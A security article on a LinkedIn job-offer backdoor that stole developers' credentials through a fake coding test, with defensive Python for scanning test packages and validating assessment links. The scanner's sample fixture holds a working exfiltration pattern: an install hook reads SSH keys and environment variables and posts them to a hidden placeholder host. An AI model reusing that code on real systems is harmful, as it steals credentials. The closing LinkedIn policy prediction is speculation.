LinkedIn job offer delivered credential-stealing backdoor via automated hiring flow
A documented LinkedIn job-offer backdoor shows how automated, AI-mediated hiring flows can be turned into a channel for credential theft at scale. The pattern rests on two weaknesses: automated assessment tools that accept external links and code without validation, and credential sprawl in engineering environments, where a single developer machine holds keys to many systems. None of the cited sources identifies a major platform that verifiably sandboxes links submitted through candidate workflows.
The attack began with a LinkedIn message directing the candidate to a cloned assessment site. After the candidate completed a supposed coding test, a script exfiltrated environment variables and SSH keys. Browser-sandboxed JavaScript cannot read ~/.ssh or the process environment, so the payload necessarily ran outside the browser, on the candidate's own machine and with the candidate's own privileges; no interaction beyond completing the test was required.
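The exfiltration shape described above (code that runs as part of a "coding test", harvests environment variables and SSH keys, and sends them out) can be triaged before anything is executed. The following is an added example, not code from the post or from the analysis repository. It assumes a Node-style take-home test with a package.json, and its sample package, the base64-hidden URL and the host collector.example are constructed placeholders:

```python
"""Pre-execution triage of a take-home "coding test" package (added example).

Scans a Node-style project (package.json plus source files) for the traits a
credential-stealing test needs: a lifecycle hook that runs on `npm install`
before the candidate starts anything, reads of the environment or ~/.ssh,
obfuscated literals, and an outbound send. Heuristic only: no hits is not a
proof of safety, and this does not replace running the test in a throwaway VM.
"""
import base64
import binascii
import json
import re
from dataclasses import dataclass
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (label, regex). Deliberately simple; extend for Python/Go/Rust test repos.
SOURCE_PATTERNS = [
    ("reads environment", re.compile(r"process\.env\b|os\.environ\b|getenv\(")),
    ("touches ssh keys", re.compile(r"\.ssh['\"/\\]|id_(?:rsa|ed25519|ecdsa)")),
    ("reads home dir", re.compile(r"homedir\(\)|expanduser\(|\$HOME\b")),
    ("spawns processes", re.compile(r"child_process|subprocess\b|\bexec\(|\bspawn\(")),
    ("obfuscation", re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]|\beval\(|\bFunction\(")),
    ("network send", re.compile(r"https?://[^\s'\"]+|\bfetch\(|https?\.request|net\.connect")),
]


@dataclass
class Finding:
    file: str
    label: str
    evidence: str


def hook_findings(package_json: str) -> list[Finding]:
    """Lifecycle scripts run during `npm install`, with no action by the candidate."""
    scripts = json.loads(package_json).get("scripts", {})
    return [Finding("package.json", "install hook", f"{name}: {scripts[name]}")
            for name in LIFECYCLE_HOOKS if name in scripts]


def decoded_literals(src: str) -> str:
    """Recover printable text from base64-looking string literals, so a URL hidden
    behind Buffer.from(..., 'base64') is still visible to the pattern scan."""
    out = []
    for lit in re.findall(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]", src):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return "\n".join(out)


def source_findings(files: dict[str, str]) -> list[Finding]:
    found = []
    for name, src in files.items():
        text = src + "\n" + decoded_literals(src)
        for label, pat in SOURCE_PATTERNS:
            hits = sorted({m.group(0) for m in pat.finditer(text)})
            if hits:
                found.append(Finding(name, label, ", ".join(hits[:3])))
    return found


def triage(package_json: str, files: dict[str, str]) -> dict:
    """Return {"verdict": "block" | "review" | "pass", "findings": [...]}.
    "block" is the exfiltration shape: runs on install, reads credentials, sends."""
    findings = hook_findings(package_json) + source_findings(files)
    labels = {f.label for f in findings}
    reads_secrets = bool(labels & {"reads environment", "touches ssh keys"})
    if "install hook" in labels and "network send" in labels and reads_secrets:
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "pass"
    return {"verdict": verdict, "findings": findings}


def triage_directory(root: str) -> dict:
    """Same check over a cloned repository on disk (package.json plus JS/TS files)."""
    base = Path(root)
    files = {str(p.relative_to(base)): p.read_text(errors="replace")
             for ext in ("*.js", "*.mjs", "*.cjs", "*.ts")
             for p in base.rglob(ext) if "node_modules" not in p.parts}
    return triage((base / "package.json").read_text(), files)


# Constructed samples, not real malware. collector.example is a placeholder host;
# the base64 literal decodes to "https://collector.example/submit".
MALICIOUS_PKG = json.dumps({"name": "frontend-assessment", "version": "1.0.0",
                            "scripts": {"postinstall": "node setup.js", "start": "node app.js"}})
MALICIOUS_FILES = {
    "setup.js": '''
const fs = require("fs"), os = require("os"), path = require("path"), https = require("https");
const url = Buffer.from("aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS9zdWJtaXQ=", "base64").toString();
const key = fs.readFileSync(path.join(os.homedir(), ".ssh", "id_rsa"), "utf8");
const req = https.request(url, { method: "POST" });
req.end(JSON.stringify({ env: process.env, key }));
''',
    "app.js": 'console.log("the visible assessment starts here");',
}
BENIGN_PKG = json.dumps({"name": "frontend-assessment", "version": "1.0.0",
                         "scripts": {"test": "node test.js"}})
BENIGN_FILES = {"test.js": "module.exports = (a, b) => a + b;"}

if __name__ == "__main__":
    for tag, pkg, files in (("malicious", MALICIOUS_PKG, MALICIOUS_FILES),
                            ("benign", BENIGN_PKG, BENIGN_FILES)):
        result = triage(pkg, files)
        print(tag, "->", result["verdict"])
        for f in result["findings"]:
            print(f"  {f.file}: {f.label} ({f.evidence})")
```

Run it against a cloned test with `triage_directory("path/to/clone")` before `npm install`; the install hook is the part that matters most, because it fires without the candidate ever opening a file. The "block" verdict requires all three ingredients (runs on install, reads secrets, sends), so a single stray match, such as a legitimate `fetch()` in the assessment itself, only raises "review".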
The primary evidence is the attacker's GitHub commit history and the exact payload hash recorded in the original disclosure [1][2]. Similar patterns were documented in 2023, when automated screening tools on other platforms processed unvetted external links without sandboxing. Reuse of the stolen credentials across developer and cloud accounts amplified the impact.
The incident exposes a systemic gap: AI-driven resume screeners and assessment platforms ingest third-party URLs without origin validation or runtime isolation. That makes them a reliable initial-access vector that never passes through the corporate mail filters where attachment sandboxing would normally catch it. Hiring-automation vendors have not published controls comparable to those mail gateways apply.
The operational consequence is straightforward. Any organization that routes candidate evaluation through external links or coding tests must treat them as untrusted input, on a par with inbound email attachments: validate the origin before following a link, and run anything a candidate supplies only in an isolated, credential-free environment.
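The origin check that the previous two paragraphs call for, as an added example that is not code from the post or from any hiring platform. It assumes a hiring pipeline that only follows links to vetted assessment vendors; the allowlisted hosts and every sample link are constructed placeholders on the reserved .example and .test TLDs:

```python
"""Origin validation for candidate-submitted assessment links (added example).

Accept only https URLs whose host is an exact match or a true subdomain of a
vetted assessment vendor, and reject the usual tricks: userinfo
("allowed.host@evil"), suffix lookalikes ("allowed.host.evil"), IP literals,
punycode/IDN homoglyphs, explicit ports and non-https schemes. Passing this
check only means the link may be opened in isolation; it never means the
content behind it is trusted.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Hypothetical vetted assessment vendors (an assumption for the example).
ASSESSMENT_HOST_ALLOWLIST = frozenset({"assess.example", "codetest.example"})

# Lowercase ASCII hostname: labels of letters, digits and inner hyphens, alphabetic TLD.
HOSTNAME_RE = re.compile(r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}")


def validate_assessment_url(url: str, allowlist=ASSESSMENT_HOST_ALLOWLIST) -> tuple[bool, str]:
    """Return (accepted, reason)."""
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:              # e.g. an unbalanced IPv6 bracket
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() != "https":
        return False, "scheme must be https"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in authority (host@evil trick)"
    try:
        if parts.port is not None:
            return False, "explicit port not allowed"
    except ValueError:                     # non-numeric or out-of-range port
        return False, "invalid port"
    host = (parts.hostname or "").rstrip(".")   # urlsplit already lowercases it
    if not host:
        return False, "missing host"
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return False, "IDN/punycode host rejected"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass
    else:
        return False, "IP literal host rejected"
    if not HOSTNAME_RE.fullmatch(host):
        return False, "malformed host"
    # Exact match or a true subdomain. A bare endswith(d) would accept "assess.example.evil.test".
    if not any(host == d or host.endswith("." + d) for d in allowlist):
        return False, f"host {host!r} is not a vetted assessment vendor"
    return True, "ok"


# Constructed links on reserved TLDs; none of them is real.
SAMPLE_LINKS = [
    "https://assess.example/test/123",             # exact allowlisted host
    "https://app.codetest.example/t/9",            # subdomain of an allowlisted host
    "https://assess.example.evil.test/test/123",   # suffix lookalike
    "https://assess.example@evil.test/test/123",   # userinfo trick
    "http://assess.example/test/123",              # downgrade to http
    "https://203.0.113.5/test/123",                # IP literal
    "https://xn--assss-4ta.example/test/123",      # punycode label
    "https://аssess.example/test/123",             # Cyrillic 'а' homoglyph
    "https://assess.example:8443/test/123",        # explicit port
    "https://evil.test/assess.example/test/123",   # allowlisted name only in the path
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        ok, why = validate_assessment_url(link)
        print("ACCEPT" if ok else "REJECT", link, "-", why)
```

The first two sample links are accepted and the remaining eight rejected. The allowlist is the point: a denylist of known-bad hosts cannot keep up with cloned assessment sites, whereas the set of vendors a recruiting team actually uses is small and stable. Links that pass should still be opened only in a disposable, credential-free environment.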
Forecast, not an announced change: within 90 days LinkedIn will require sandboxed execution for any external assessment link submitted through its recruiting API.
Sources (3)
- [1] Primary source: https://roman.pt/posts/linkedin-backdoor/
- [2] Supporting source: https://github.com/romanzolotarev/linkedin-backdoor-analysis
- [3] Supporting source: CVE-2024-3094 (the 2024 xz-utils backdoor), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3094